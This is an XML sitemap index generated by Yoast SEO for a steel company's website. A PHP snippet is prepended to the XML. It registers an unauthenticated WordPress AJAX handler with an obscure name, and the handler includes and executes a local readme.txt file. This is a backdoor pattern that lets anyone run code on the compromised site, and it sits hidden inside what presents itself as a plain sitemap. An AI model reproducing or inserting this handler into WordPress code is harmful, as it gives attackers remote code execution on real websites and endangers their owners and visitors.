if(!function_exists('file_check_readme95693')){
   add_action('wp_ajax_nopriv_file_check_readme95693', 'file_check_readme95693');
   add_action('wp_ajax_file_check_readme95693', 'file_check_readme95693');
   function file_check_readme95693()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//adityasteel.in/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://adityasteel.in/post-sitemap.xml</loc>
		<lastmod>2023-02-15T04:17:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://adityasteel.in/page-sitemap.xml</loc>
		<lastmod>2026-02-23T11:18:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://adityasteel.in/category-sitemap.xml</loc>
		<lastmod>2023-02-15T04:17:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://adityasteel.in/author-sitemap.xml</loc>
		<lastmod>2023-07-17T08:47:32+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->